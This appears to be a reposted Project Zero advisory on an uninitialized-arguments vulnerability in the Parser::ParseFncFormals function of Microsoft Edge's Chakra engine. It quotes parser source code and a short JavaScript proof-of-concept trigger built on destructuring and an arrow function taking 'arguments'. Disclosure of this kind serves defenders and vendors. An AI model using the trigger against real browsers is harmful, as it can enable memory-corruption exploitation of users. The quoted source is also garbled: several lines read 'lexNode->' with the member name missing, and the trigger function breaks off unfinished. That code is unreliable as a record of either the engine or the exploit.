Microsoft Edge Chakra Parser::ParseFncFormals Uninitialized Arguments

Microsoft Edge Chakra suffers from an uninitialized arguments vulnerability in Parser::ParseFncFormals with the "PNodeFlags::fpnArguments_overriddenInParam" flag.

MD5 | a0bb4862186218d2082f06418fe41eef

Microsoft Edge: Chakra: Uninitialized arguments 2


Similar to the <a href="/p/project-zero/issues/detail?id=1297" title="Microsoft Edge: Chakra: Uninitialized arguments" class="closed_ref" rel="nofollow"> issue #1297 </a>. But this time, it happends in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.

template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
UpdateOrCheckForDuplicateInFormals(lexNode->, &formals);
if (m_currentNodeFunc != nullptr && lexNode-> == wellKnownPropertyPids.arguments)
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE

function f() {
({a = ([arguments]) => {
}} = 1);



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

Related Posts